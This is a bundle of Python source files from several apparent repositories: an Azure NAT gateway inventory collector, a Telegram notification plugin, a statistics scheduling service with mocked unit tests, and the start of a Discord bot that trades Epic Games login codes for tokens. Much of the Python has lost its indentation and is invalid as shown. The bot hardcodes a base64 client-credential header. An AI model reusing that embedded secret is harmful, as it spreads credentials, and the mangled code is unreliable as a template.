_LOGGER.error(ERROR_KEY_VAULTS(field='Private Endpoints'))
```
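The manager above repeatedly indexes into `split('/')` on Azure resource IDs (indices 4, 8, and 10). A worked example of which path segments those indices land on; the names are made up:
```python
rid = ('/subscriptions/<sub-id>/resourceGroups/my-rg/providers/'
       'Microsoft.KeyVault/vaults/my-vault/privateEndpointConnections/my-pec')
parts = rid.split('/')
print(parts[4])   # 'my-rg'    (resource group, cf. get_resource_group_from_id)
print(parts[8])   # 'my-vault' (parent resource name)
print(parts[10])  # 'my-pec'   (child resource, cf. get_private_endpoint_name)
```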
#### File: inventory/manager/nat_gateway_manager.py
```python
from spaceone.inventory.libs.manager import AzureManager
from spaceone.inventory.libs.schema.base import ReferenceModel
from spaceone.inventory.connector.nat_gateway import NATGatewayConnector
from spaceone.inventory.model.natgateway.cloud_service import *
from spaceone.inventory.model.natgateway.cloud_service_type import CLOUD_SERVICE_TYPES
from spaceone.inventory.model.natgateway.data import *
import time
import ipaddress
import logging
_LOGGER = logging.getLogger(__name__)
class NATGatewayManager(AzureManager):
connector_name = 'NATGatewayConnector'
cloud_service_types = CLOUD_SERVICE_TYPES
def collect_cloud_service(self, params):
"""
Args:
params (dict):
- 'options' : 'dict'
- 'schema' : 'str'
- 'secret_data' : 'dict'
- 'filter' : 'dict'
- 'zones' : 'list'
- 'subscription_info' : 'dict'
Response:
CloudServiceResponse (dict) : dictionary of azure nat gateway data resource information
"""
_LOGGER.debug(f'** NAT Gateway START **')
start_time = time.time()
subscription_info = params['subscription_info']
nat_gateway_conn: NATGatewayConnector = self.locator.get_connector(self.connector_name, **params)
nat_gateways = []
nat_gateways_list = nat_gateway_conn.list_all_nat_gateways()
for nat_gateway in nat_gateways_list:
nat_gateway_dict = self.convert_nested_dictionary(self, nat_gateway)
# update application_gateway_dict
nat_gateway_dict.update({
'resource_group': self.get_resource_group_from_id(nat_gateway_dict['id']),
# parse resource_group from ID
'subscription_id': subscription_info['subscription_id'],
'subscription_name': subscription_info['subscription_name'],
})
if nat_gateway_dict.get('public_ip_addresses') is not None:
# Get Count of Public IP Address
try:
nat_gateway_dict.update({
'public_ip_addresses_count': len(nat_gateway_dict['public_ip_addresses'])
})
except Exception as e:
_LOGGER.error(f'[ERROR]: Azure NAT Gateway Manager]: Get Public IP Addresses Count: {e}')
# Get Public IP Address Dictionary
try:
                    if nat_gateway_dict['public_ip_addresses']:
                        pip_list = []
                        for pip in nat_gateway_dict['public_ip_addresses']:
                            public_ip_address_id = pip['id']
                            pip_dict = self.get_public_ip_address_dict(self, nat_gateway_conn, public_ip_address_id)
                            pip_list.append(pip_dict)
                        nat_gateway_dict['public_ip_addresses'] = pip_list
except Exception as e:
_LOGGER.error(f'[ERROR: Azure NAT Gateway Manager Get Public IP Addresses Dictionary]: {e}')
if nat_gateway_dict.get('public_ip_prefixes') is not None:
try:
nat_gateway_dict.update({
                        'public_ip_prefixes_count': len(nat_gateway_dict['public_ip_prefixes'])
})
except Exception as e:
_LOGGER.debug(f'[ERROR: Azure NAT Gateway Manager Get Public IP Prefixes Count]: {e}')
# Get Public IP Address Dictionary
try:
                    if nat_gateway_dict['public_ip_prefixes']:
                        pip_list = []
                        for pip in nat_gateway_dict['public_ip_prefixes']:
                            public_ip_prefixes_id = pip['id']
                            pip_dict = self.get_public_ip_prefixes_dict(self, nat_gateway_conn, public_ip_prefixes_id)
                            pip_list.append(pip_dict)
                        nat_gateway_dict['public_ip_prefixes'] = pip_list
except Exception as e:
_LOGGER.error(f'[ERROR: Azure NAT Gateway Manager Get Public IP Prefixes Dictionary]: {e}')
if nat_gateway_dict.get('subnets') is not None:
try:
nat_gateway_dict.update({
'subnets': self.get_subnets(self, nat_gateway_conn, nat_gateway_dict['subnets'])
})
except Exception as e:
_LOGGER.error(f'[ERROR: Azure NAT Gateway Manager Get Subnet]: {e}')
_LOGGER.debug(f'[NAT GATEWAYS INFO] {nat_gateway_dict}')
nat_gateway_data = NatGateway(nat_gateway_dict, strict=False)
application_gateway_resource = NatGatewayResource({
'data': nat_gateway_data,
'region_code': nat_gateway_data.location,
'reference': ReferenceModel(nat_gateway_data.reference()),
'name': nat_gateway_data.name
})
# Must set_region_code method for region collection
self.set_region_code(nat_gateway_data['location'])
nat_gateways.append(NatGatewayResponse({'resource': application_gateway_resource}))
_LOGGER.debug(f'** NAT Gateway Finished {time.time() - start_time} Seconds **')
return nat_gateways
@staticmethod
def get_public_ip_address_dict(self, nat_gateway_conn, pip_id):
try:
pip_name = pip_id.split('/')[8]
resource_group_name = pip_id.split('/')[4]
pip_obj = nat_gateway_conn.get_public_ip_addresses(resource_group_name=resource_group_name, public_ip_address_name=pip_name)
pip_dict = self.convert_nested_dictionary(self, pip_obj)
return pip_dict
except Exception as e:
_LOGGER.error(f'[ERROR: Azure NAT Gateway Manager Get Public IP Addresses Dictionary]: {e}')
@staticmethod
def get_public_ip_prefixes_dict(self, nat_gateway_conn, pip_id):
try:
pip_name = pip_id.split('/')[8]
resource_group_name = pip_id.split('/')[4]
pip_obj = nat_gateway_conn.get_public_ip_prefixes(resource_group_name=resource_group_name, public_ip_prefixes_name=pip_name)
pip_dict = self.convert_nested_dictionary(self, pip_obj)
return pip_dict
except Exception as e:
_LOGGER.error(f'[ERROR: Azure NAT Gateway Manager Get Public IP Prefixes Dictionary]: {e}')
@staticmethod
def get_subnets(self, nat_gateway_conn, subnets):
subnet_list = []
try:
for subnet in subnets:
resource_group_name = subnet['id'].split('/')[4]
subnet_name = subnet['id'].split('/')[10]
vnet_name = subnet['id'].split('/')[8]
subnet_obj = nat_gateway_conn.get_subnet(resource_group_name=resource_group_name, subnet_name=subnet_name, vnet_name=vnet_name)
subnet_dict = self.convert_nested_dictionary(self, subnet_obj)
subnet_dict.update({
'virtual_network': vnet_name
})
subnet_list.append(subnet_dict)
return subnet_list
except Exception as e:
_LOGGER.error(f'[ERROR: Azure NAT Gateway Manager Get Subnets]: {e}')
```
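`convert_nested_dictionary()` comes from the `AzureManager` base class and is not shown here. A minimal sketch of what such a helper typically does, assuming azure-mgmt (msrest) model objects expose `as_dict()` and falling back to `vars()` for plain objects; this is an illustration, not the project's actual implementation:
```python
def to_nested_dict(obj):
    if hasattr(obj, 'as_dict'):  # azure-mgmt (msrest) model objects
        return obj.as_dict()
    if isinstance(obj, dict):
        return {k: to_nested_dict(v) for k, v in obj.items()}
    if isinstance(obj, list):
        return [to_nested_dict(v) for v in obj]
    if hasattr(obj, '__dict__'):  # generic objects
        return {k: to_nested_dict(v) for k, v in vars(obj).items()}
    return obj  # scalars pass through unchanged
```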
|
{
"source": "jean1042/plugin-telegram-notification-protocol",
"score": 2
}
|
#### File: api/plugin/protocol.py
```python
from spaceone.api.notification.plugin import protocol_pb2_grpc, protocol_pb2
from spaceone.core.pygrpc import BaseAPI
from spaceone.core.pygrpc.message_type import *
from spaceone.notification.service import ProtocolService
class Protocol(BaseAPI, protocol_pb2_grpc.ProtocolServicer):
pb2 = protocol_pb2
pb2_grpc = protocol_pb2_grpc
def init(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('ProtocolService', metadata) as protocol_svc:
plugin_info = protocol_svc.init(params)
return self.locator.get_info('PluginInfo', plugin_info)
def verify(self, request, context):
params, metadata = self.parse_request(request, context)
collector_svc: ProtocolService = self.locator.get_service('ProtocolService', metadata)
with collector_svc:
collector_svc.verify(params)
return self.locator.get_info('EmptyInfo')
```
#### File: notification/manager/notification_manager.py
```python
from spaceone.core.manager import BaseManager
from spaceone.notification.manager.telegram_manager import TelegramManager
class NotificationManager(BaseManager):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def dispatch(self, token, chat_id, message, **kwargs):
telegram_mgr: TelegramManager = self.locator.get_manager('TelegramManager')
telegram_mgr.set_connector(token)
telegram_mgr.send_message(chat_id=chat_id, message=message, **kwargs)
```
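`TelegramManager.send_message` is not shown; a minimal sketch of the Bot API call it presumably wraps (the endpoint is Telegram's documented `sendMessage` method; the error handling here is illustrative):
```python
import requests

def send_message(token, chat_id, message):
    url = f'https://api.telegram.org/bot{token}/sendMessage'
    response = requests.post(url, data={'chat_id': chat_id, 'text': message})
    response.raise_for_status()
    return response.json()
```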
|
{
"source": "jean1042/statistics",
"score": 2
}
|
#### File: statistics/manager/history_manager.py
```python
import logging
from datetime import datetime
from spaceone.core.manager import BaseManager
from spaceone.statistics.model.history_model import History
_LOGGER = logging.getLogger(__name__)
class HistoryManager(BaseManager):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.history_model: History = self.locator.get_model('History')
def create_history(self, schedule_vo, topic, results, domain_id):
def _rollback(history_vo):
_LOGGER.info(f'[create_history._rollback] '
f'Delete history : {history_vo.topic}')
history_vo.deregister()
created_at = datetime.utcnow()
for values in results:
history_data = {
'topic': topic,
'schedule': schedule_vo,
'values': values,
'created_at': created_at,
'domain_id': domain_id
}
_LOGGER.debug(f'[create_history] create history: {history_data}')
history_vo: History = self.history_model.create(history_data)
self.transaction.add_rollback(_rollback, history_vo)
    def list_history(self, query=None):
        return self.history_model.query(**(query or {}))
def stat_history(self, query):
return self.history_model.stat(**query)
```
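`transaction.add_rollback()` registers a compensating action to run if the surrounding transaction fails. The real `Transaction` lives in spaceone-core; a toy sketch of the pattern, offered as an assumption-level illustration:
```python
class Transaction:
    def __init__(self):
        self._rollbacks = []

    def add_rollback(self, fn, *args, **kwargs):
        self._rollbacks.append((fn, args, kwargs))

    def execute_rollback(self):
        # undo in reverse order of registration
        for fn, args, kwargs in reversed(self._rollbacks):
            fn(*args, **kwargs)
```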
#### File: statistics/service/schedule_service.py
```python
import logging
import copy
from spaceone.core.service import *
from spaceone.core import utils
from spaceone.statistics.error import *
from spaceone.statistics.manager.resource_manager import ResourceManager
from spaceone.statistics.manager.schedule_manager import ScheduleManager
_LOGGER = logging.getLogger(__name__)
@authentication_handler
@authorization_handler
@mutation_handler
@event_handler
class ScheduleService(BaseService):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.resource_mgr: ResourceManager = self.locator.get_manager('ResourceManager')
self.schedule_mgr: ScheduleManager = self.locator.get_manager('ScheduleManager')
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['topic', 'options', 'schedule', 'domain_id', 'user_id'])
def add(self, params):
"""Add schedule for statistics
Args:
params (dict): {
'topic': 'str',
'options': 'dict',
'schedule': 'dict',
'tags': 'dict',
'domain_id': 'str',
'user_id': 'str'
}
Returns:
schedule_vo
"""
domain_id = params['domain_id']
options = copy.deepcopy(params['options'])
schedule = params['schedule']
user_id = params['user_id']
if 'tags' in params:
params['tags'] = utils.dict_to_tags(params['tags'])
self._check_schedule(schedule)
self._verify_query_option(options, domain_id)
return self.schedule_mgr.add_schedule(params)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['schedule_id', 'domain_id'])
def update(self, params):
"""Update schedule
Args:
params (dict): {
'schedule_id': 'str',
'schedule': 'dict',
'tags': 'dict',
'domain_id': 'str'
}
Returns:
schedule_vo
"""
schedule = params.get('schedule')
if 'tags' in params:
params['tags'] = utils.dict_to_tags(params['tags'])
self._check_schedule(schedule)
return self.schedule_mgr.update_schedule(params)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['schedule_id', 'domain_id'])
def enable(self, params):
"""Enable schedule
Args:
params (dict): {
'schedule_id': 'str',
'domain_id': 'str'
}
Returns:
schedule_vo
"""
domain_id = params['domain_id']
schedule_id = params['schedule_id']
schedule_vo = self.schedule_mgr.get_schedule(schedule_id, domain_id)
return self.schedule_mgr.update_schedule_by_vo({'state': 'ENABLED'}, schedule_vo)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['schedule_id', 'domain_id'])
def disable(self, params):
"""Disable schedule
Args:
params (dict): {
'schedule_id': 'str',
'domain_id': 'str'
}
Returns:
schedule_vo
"""
domain_id = params['domain_id']
schedule_id = params['schedule_id']
schedule_vo = self.schedule_mgr.get_schedule(schedule_id, domain_id)
return self.schedule_mgr.update_schedule_by_vo({'state': 'DISABLED'}, schedule_vo)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['schedule_id', 'domain_id'])
def delete(self, params):
"""Delete schedule
Args:
params (dict): {
'schedule_id': 'str',
'domain_id': 'str'
}
Returns:
None
"""
self.schedule_mgr.delete_schedule(params['schedule_id'], params['domain_id'])
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['schedule_id', 'domain_id'])
def get(self, params):
"""Get schedule
Args:
params (dict): {
'schedule_id': 'str',
'domain_id': 'str',
'only': 'list'
}
Returns:
schedule_vo
"""
return self.schedule_mgr.get_schedule(params['schedule_id'], params['domain_id'], params.get('only'))
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['domain_id'])
@append_query_filter(['schedule_id', 'topic', 'state', 'data_source_id', 'resource_type', 'domain_id'])
@change_tag_filter('tags')
@append_keyword_filter(['schedule_id', 'topic', 'resource_type'])
def list(self, params):
""" List schedules
Args:
params (dict): {
'schedule_id': 'str',
'topic': 'str',
'state': 'str',
'data_source_id': 'str',
'resource_type': 'str',
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.Query)'
}
Returns:
schedule_vos (object)
total_count
"""
query = params.get('query', {})
return self.schedule_mgr.list_schedules(query)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['query', 'domain_id'])
@append_query_filter(['domain_id'])
@change_tag_filter('tags')
@append_keyword_filter(['schedule_id', 'topic', 'resource_type'])
def stat(self, params):
"""
Args:
params (dict): {
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.StatisticsQuery)'
}
Returns:
values (list) : 'list of statistics data'
"""
query = params.get('query', {})
return self.schedule_mgr.stat_schedules(query)
@transaction
@append_query_filter([])
def list_domains(self, params):
""" This is used by Scheduler
Returns:
results (list)
total_count (int)
"""
mgr = self.locator.get_manager('ScheduleManager')
query = params.get('query', {})
result = mgr.list_domains(query)
return result
@staticmethod
def _check_schedule(schedule):
if schedule and len(schedule) > 1:
raise ERROR_SCHEDULE_OPTION()
def _verify_query_option(self, options, domain_id):
aggregate = options.get('aggregate', [])
page = options.get('page', {})
self.resource_mgr.stat(aggregate, page, domain_id)
```
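A standalone restatement of the `_check_schedule` rule above: a schedule dict may carry at most one scheduling option. The option names below are illustrative; only the length check is taken from the code:
```python
def check_schedule(schedule):
    if schedule and len(schedule) > 1:
        raise ValueError('exactly one schedule option may be set')

check_schedule({'cron': '*/5 * * * *'})                     # ok: one option
check_schedule(None)                                        # ok: update without schedule
# check_schedule({'cron': '*/5 * * * *', 'interval': 300})  # would raise
```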
#### File: test/api/test_storage_api.py
```python
import unittest
import copy
import os
from unittest.mock import patch
from mongoengine import connect, disconnect
from google.protobuf.json_format import MessageToDict
from google.protobuf.empty_pb2 import Empty
from spaceone.core.unittest.result import print_message
from spaceone.core.unittest.runner import RichTestRunner
from spaceone.core import config
from spaceone.core import utils
from spaceone.core.service import BaseService
from spaceone.core.locator import Locator
from spaceone.core.pygrpc import BaseAPI
from spaceone.api.statistics.v1 import storage_pb2
from spaceone.statistics.api.v1.storage import Storage
from test.factory.storage_factory import StorageFactory
from spaceone.statistics.connector import PluginConnector
from spaceone.core.model.mongo_model import MongoModel
class _MockStorageService(BaseService):
'''
def add(self, params):
params = copy.deepcopy(params)
if 'tags' in params:
params['tags'] = utils.dict_to_tags(params['tags'])
return ScheduleFactory(**params)
def update(self, params):
params = copy.deepcopy(params)
if 'tags' in params:
params['tags'] = utils.dict_to_tags(params['tags'])
return ScheduleFactory(**params)
def delete(self, params):
pass
def enable(self, params):
return ScheduleFactory(**params)
def disable(self, params):
return ScheduleFactory(**params)
def get(self, params):
return ScheduleFactory(**params)
def list(self, params):
return ScheduleFactory.build_batch(10, **params), 10
def stat(self, params):
return {
'results': [{'project_id': utils.generate_id('project'), 'server_count': 100}]
}
'''
def get(self, params):
params = copy.deepcopy(params)
return StorageFactory(**params)
def register(self, params):
return StorageFactory(**params)
def update(self, params):
params = copy.deepcopy(params)
return StorageFactory(**params)
def list(self, params):
return StorageFactory.build_batch(10, **params), 10
def enable(self, params):
return StorageFactory(**params)
def disable(self, params):
return StorageFactory(**params)
def deregister(self, params):
return StorageFactory(**params)
def update_plugin(self, params):
return StorageFactory(**params)
def verify_plugin(self, params):
return StorageFactory(**params)
class TestStorageAPI(unittest.TestCase):
@classmethod
def setUpClass(cls):
config.init_conf(package='spaceone.statistics')
connect('test', host='mongomock://localhost')
config_path = os.environ.get('SPACEONE_CONFIG_FILE')
super().setUpClass()
@classmethod
def tearDownClass(cls) -> None:
super().tearDownClass()
disconnect()
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockStorageService())
@patch.object(BaseAPI, 'parse_request')
def test_register_storage(self, mock_parse_request, *args):
params = {
'name': utils.generate_id('storage', 4),
'tags': {
utils.random_string(5): utils.random_string(5)
},
'plugin_info': {
'plugin_id': utils.generate_id('plugin'),
'version': '1.1',
'secret_id': utils.generate_id('secret')
},
'user_id': utils.generate_id('user'),
'domain_id': utils.generate_id('domain')
}
mock_parse_request.return_value = (params, {})
storage_servicer = Storage()
storage_info = storage_servicer.register(params, {})
print_message(storage_info, 'test_register_storage')
storage_data = MessageToDict(storage_info, preserving_proto_field_name=True)
self.assertIsInstance(storage_info, storage_pb2.StorageInfo)
self.assertEqual(storage_info.name, params['name'])
self.assertEqual(storage_data['state'], 'ENABLED')
# self.assertIsNotNone(storage_info.capability)
self.assertDictEqual(storage_data['tags'], params['tags'])
self.assertIsInstance(storage_info.plugin_info, storage_pb2.PluginInfo) # Check if 'PluginInfo' exists
self.assertEqual(storage_data['plugin_info']['plugin_id'], params['plugin_info']['plugin_id'])
self.assertEqual(storage_data['plugin_info']['version'], params['plugin_info']['version'])
self.assertEqual(storage_data['domain_id'], params['domain_id'])
self.assertIsNotNone(getattr(storage_info, 'created_at', None))
print(f'[TEST REGISTER STORAGE] {storage_data}')
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockStorageService())
@patch.object(BaseAPI, 'parse_request')
def test_update_storage(self, mock_parse_request, *args):
params = {
'storage_id': utils.generate_id('storage'),
'name': 'update-storage-name',
'tags': {
'update_key': 'update_value'
},
'domain_id': utils.generate_id('domain')
}
mock_parse_request.return_value = (params, {})
storage_servicer = Storage()
storage_info = storage_servicer.update(params, {})
print_message(storage_info, 'test_update_schedule')
storage_data = MessageToDict(storage_info, preserving_proto_field_name=True)
self.assertIsInstance(storage_info, storage_pb2.StorageInfo)
self.assertEqual(storage_data['name'], params['name'])
self.assertEqual(storage_data['storage_id'], params['storage_id'])
self.assertDictEqual(storage_data['tags'], params['tags'])
print(f'[TEST UPDATE STORAGE] {storage_data}')
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockStorageService())
@patch.object(BaseAPI, 'parse_request')
def test_get_storage(self, mock_parse_request, *args):
mock_parse_request.return_value = ({}, {})
params = {
'domain_id': utils.generate_id('domain'),
'storage_id': utils.generate_id('storage')
}
storage_servicer = Storage()
storage_info = storage_servicer.get(params, {})
storage_data = MessageToDict(storage_info, preserving_proto_field_name=True)
print_message(storage_info, 'test_get_schedule')
self.assertIsInstance(storage_info, storage_pb2.StorageInfo)
print(f'[TEST GET STORAGE] {storage_data}')
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockStorageService())
@patch.object(BaseAPI, 'parse_request')
def test_list_schedules(self, mock_parse_request, *args):
mock_parse_request.return_value = ({}, {})
storage_servicer = Storage()
schedules_info = storage_servicer.list({}, {})
print_message(schedules_info, 'test_list_schedules')
self.assertIsInstance(schedules_info, storage_pb2.StoragesInfo)
self.assertIsInstance(schedules_info.results[0], storage_pb2.StorageInfo)
self.assertEqual(schedules_info.total_count, 10)
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockStorageService())
@patch.object(BaseAPI, 'parse_request')
def test_enable_storage(self, mock_parse_request, *args):
params = {
'storage_id': utils.generate_id('storage'),
'state': 'ENABLED',
'domain_id': utils.generate_id('domain')
}
mock_parse_request.return_value = (params, {})
storage_servicer = Storage()
storage_info = storage_servicer.enable(params, {})
storage_data = MessageToDict(storage_info, preserving_proto_field_name=True)
print_message(storage_info, 'test_enable_storage')
self.assertIsInstance(storage_info, storage_pb2.StorageInfo)
self.assertEqual(storage_info.state, storage_pb2.StorageInfo.State.ENABLED)
print(f'[TEST ENABLE STORAGE] {storage_data}')
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockStorageService())
@patch.object(BaseAPI, 'parse_request')
def test_disable_storage(self, mock_parse_request, *args):
params = {
'storage_id': utils.generate_id('storage'),
'state': 'DISABLED',
'domain_id': utils.generate_id('domain')
}
mock_parse_request.return_value = (params, {})
storage_servicer = Storage()
storage_info = storage_servicer.disable(params, {})
storage_data = MessageToDict(storage_info, preserving_proto_field_name=True)
print_message(storage_info, 'test_disable_storage')
self.assertIsInstance(storage_info, storage_pb2.StorageInfo)
self.assertEqual(storage_info.state, storage_pb2.StorageInfo.State.DISABLED)
print(f'[TEST DISABLE STORAGE] {storage_data}')
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockStorageService())
@patch.object(BaseAPI, 'parse_request')
def test_deregister_storage(self, mock_parse_request, *args):
params = {
'storage_id': utils.generate_id('storage'),
'domain_id': utils.generate_id('domain')
}
mock_parse_request.return_value = (params, {})
storage_servicer = Storage()
storage_info = storage_servicer.deregister(params, {})
storage_data = MessageToDict(storage_info, preserving_proto_field_name=True)
print_message(storage_info, 'test_deregister_storage')
# TODO : ASK!!
# self.assertIsInstance(storage_info, Empty)
# self.assertEqual(storage_info.state, storage_pb2.StorageInfo.State.DISABLED)
print(f'[TEST DEREGISTER STORAGE] {storage_data}')
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockStorageService())
@patch.object(PluginConnector, '__init__', return_value=None)
@patch.object(PluginConnector, 'initialize', return_value='grpc://plugin.spaceone.dev:50051')
@patch.object(PluginConnector, 'get_plugin_endpoint', return_value='grpc://plugin.spaceone.dev:50051')
@patch.object(BaseAPI, 'parse_request')
def test_update_plugin(self, mock_parse_request, *args):
params = {
'storage_id': utils.generate_id('storage'),
'name': 'storage-plugin-update',
'plugin_info': {
'plugin_id': utils.generate_id('storage'),
'version': '3.0',
'options': {},
},
'tags': {
'update_key': 'update_value'
},
'domain_id': utils.generate_id('domain')
}
mock_parse_request.return_value = (params, {})
storage_servicer = Storage()
storage_info = storage_servicer.update_plugin(params, {})
storage_data = MessageToDict(storage_info, preserving_proto_field_name=True)
print_message(storage_info, 'test_update_storage_plugin')
self.assertIsInstance(storage_info, storage_pb2.StorageInfo)
self.assertEqual(storage_info.name, params['name'])
self.assertDictEqual(storage_data['tags'], params['tags'])
self.assertEqual(storage_info.plugin_info.version, params['plugin_info']['version'])
self.assertIsNotNone(storage_info.plugin_info)
print(f'[TEST UPDATE STORAGE PLUGIN] {storage_data}')
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockStorageService())
@patch.object(PluginConnector, '__init__', return_value=None)
@patch.object(PluginConnector, 'initialize', return_value='grpc://plugin.spaceone.dev:50051')
@patch.object(PluginConnector, 'get_plugin_endpoint', return_value='grpc://plugin.spaceone.dev:50051')
@patch.object(BaseAPI, 'parse_request')
def test_verify_plugin(self, mock_parse_request, *args):
params = {
'storage_id': utils.generate_id('storage'),
'domain_id': utils.generate_id('domain')
}
mock_parse_request.return_value = (params, {})
storage_servicer = Storage()
storage_info = storage_servicer.verify_plugin(params, {})
storage_data = MessageToDict(storage_info, preserving_proto_field_name=True)
print_message(storage_info, 'test_deregister_storage_plugin')
self.assertIsInstance(storage_info, Empty)
print(f'[TEST VERIFY STORAGE PLUGIN] {storage_data}')
if __name__ == "__main__":
unittest.main(testRunner=RichTestRunner)
```
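The tests above swap the real service for `_MockStorageService` by patching `Locator.get_service`. The same mechanism in isolation, using only the standard library (the class below is a stand-in, not spaceone's `Locator`):
```python
from unittest.mock import patch

class ServiceLocator:
    def get_service(self, name, metadata=None):
        raise RuntimeError('would resolve the real service')

with patch.object(ServiceLocator, 'get_service', return_value='mock service'):
    print(ServiceLocator().get_service('StorageService'))  # 'mock service'
# outside the context manager the original method is restored
```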
|
{
"source": "jean1398reborn/stw-daily",
"score": 2
}
|
#### File: jean1398reborn/stw-daily/Save the World Daily.py
```python
import asyncio
import datetime
import json
# noinspection PyUnresolvedReferences
import os
import time
import random
import discord
import discord.member
import psutil
import requests
from discord.ext import commands
import items
from discord_slash import SlashCommand
from discord_slash.utils.manage_commands import create_option, create_choice
# ur function is broken its only guaranteed for 2020
# :o you're right..
def mixedCase(*args):
"""
Generates a completely random number
Guaranteed to be random 100% **WORKING 2020** FREE HD 4k
"""
total = []
import itertools
for string in args:
a = map(''.join, itertools.product(*((c.upper(), c.lower()) for c in string)))
for x in list(a): total.append(x)
return list(total)
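# e.g. mixedCase('of') -> ['OF', 'Of', 'oF', 'of']; output size is 2**len(string)
# (minus duplicates for caseless characters such as spaces), so keep inputs short.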
client = commands.AutoShardedBot(case_insensitive=True, command_prefix=mixedCase('stw '))
client.remove_command('help')
slash = SlashCommand(client, sync_commands=True)
uptime_start = datetime.datetime.utcnow()
daily_feedback = ""
r = ''
guild_ids = None
amount2 = ''
rewards = ''
errorList = ["That wasn't supposed to happen", "Whoops!", "We hit a roadblock", "Not the llama you're looking for",
"Uh-oh! Something goofed"]
tipsList = [
"You can [refresh the final page](https://www.epicgames.com/id/api/redirect?clientId=ec684b8c687f479fadea3cb2ad83f5c6&responseType=code) to get a new code (if you're signed in)",
"Follow [@STW_Daily](https://twitter.com/STW_Daily) on Twitter for the latest updates in your timeline",
"Found a problem? [Join the support server](https://discord.gg/MtSgUu)",
"Found problems with the translation feature? [Join the support server](https://discord.gg/MtSgUu) and let us know!", "You are epic! Keep doing you! ❤"]
class endpoints:
ac = "https://www.epicgames.com/id/logout?redirectUrl=https%3A%2F%2Fwww.epicgames.com%2Fid%2Flogin%3FredirectUrl%3Dhttps%253A%252F%252Fwww.epicgames.com%252Fid%252Fapi%252Fredirect%253FclientId%253Dec684b8c687f479fadea3cb2ad83f5c6%2526responseType%253Dcode"
token = "https://account-public-service-prod.ol.epicgames.com/account/api/oauth/token"
reward = "https://fortnite-public-service-prod11.ol.epicgames.com/fortnite/api/game/v2/profile/{0}/client/ClaimLoginReward?profileId=campaign"
def lastmfunction():
try:
# put path to ur py file here if u want the most useless functionality
lastm = datetime.datetime.utcfromtimestamp(os.path.getmtime(r'/app/stw-daily-heroku.py')).strftime(
'%I:%M %p - %d/%m/%Y')
except:
lastm = 'Not available'
return lastm
# noinspection PyUnboundLocalVariable,PyShadowingNames
def getToken(authCode: str):
h = {
"Content-Type": "application/x-www-form-urlencoded",
"Authorization": "basic ZWM2ODRiOGM2ODdmNDc5ZmFkZWEzY2IyYWQ4M2Y1YzY6ZTFmMzFjMjExZjI4NDEzMTg2MjYyZDM3YTEzZmM4NGQ="
}
d = {
"grant_type": "authorization_code",
"code": authCode
}
r = requests.post(endpoints.token, headers=h, data=d)
# print(r.text)
r = json.loads(r.text)
if "access_token" in r:
access_token = r["access_token"]
account_id = r["account_id"]
# print(f"access_token: {access_token}\naccount_id: {account_id}\nexpires_at: {r['expires_at']}")
return access_token, account_id
else:
if "errorCode" in r:
# print(r)
print(f"[ERROR] {r['errorCode']}")
err = r['errorCode']
reason = r['errorMessage']
else:
print("[ERROR] Unknown error")
return False, err, reason
def get_bot_uptime():
now = datetime.datetime.utcnow()
delta = now - uptime_start
hours, remainder = divmod(int(delta.total_seconds()), 3600)
minutes, seconds = divmod(remainder, 60)
days, hours = divmod(hours, 24)
fmt = '{d} days, {h} hours, {m} minutes, and {s} seconds'
return fmt.format(d=days, h=hours, m=minutes, s=seconds)
def time_until_end_of_day():
tomorrow = datetime.datetime.utcnow() + datetime.timedelta(days=1)
a = datetime.datetime.combine(tomorrow, datetime.time.min) - datetime.datetime.utcnow()
hours, remainder = divmod(int(a.total_seconds()), 3600)
minutes, seconds = divmod(remainder, 60)
days, hours = divmod(hours, 24)
fmt = ''
if hours == 1:
fmt += '{h} hour, '
else:
fmt += '{h} hours, '
if minutes == 1:
fmt += '{m} minute'
else:
fmt += '{m} minutes'
return fmt.format(h=hours, m=minutes)
# print(fmt.format(h=hours, m=minutes))
@client.event
async def on_ready():
print('Client open')
await client.change_presence(
activity=discord.Activity(type=discord.ActivityType.listening,
name=f"stw help | Reset in: \n{time_until_end_of_day()}\n | In {len(client.guilds)} guilds"))
async def update_status():
await client.wait_until_ready()
while True:
await client.change_presence(
activity=discord.Activity(type=discord.ActivityType.listening,
name=f"stw help | Reset in: \n{time_until_end_of_day()}\n | In {len(client.guilds)} guilds"))
await asyncio.sleep(60)
# noinspection PyBroadException
async def info_command(message):
try:
osgetlogin = os.getlogin()
except:
osgetlogin = 'Not Available'
embed = discord.Embed(title='Information', description='Statistics:', colour=discord.Colour.red())
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/695117839383920641/759372935676559400/Asset_4.14x.png')
embed.set_author(name=message.author.name, icon_url=message.author.avatar_url)
embed.add_field(name='Host statistics:', value=f'os.name: {os.name}\nos.cpu_count: {os.cpu_count()}\n'
f'os.getcwd: {os.getcwd()}\nos.getlogin: {osgetlogin}\n'
f'CPU usage: {psutil.cpu_percent()}%\n'
f'CPU Freq: {int(psutil.cpu_freq().current)}mhz\nRAM Usage:\nTotal: '
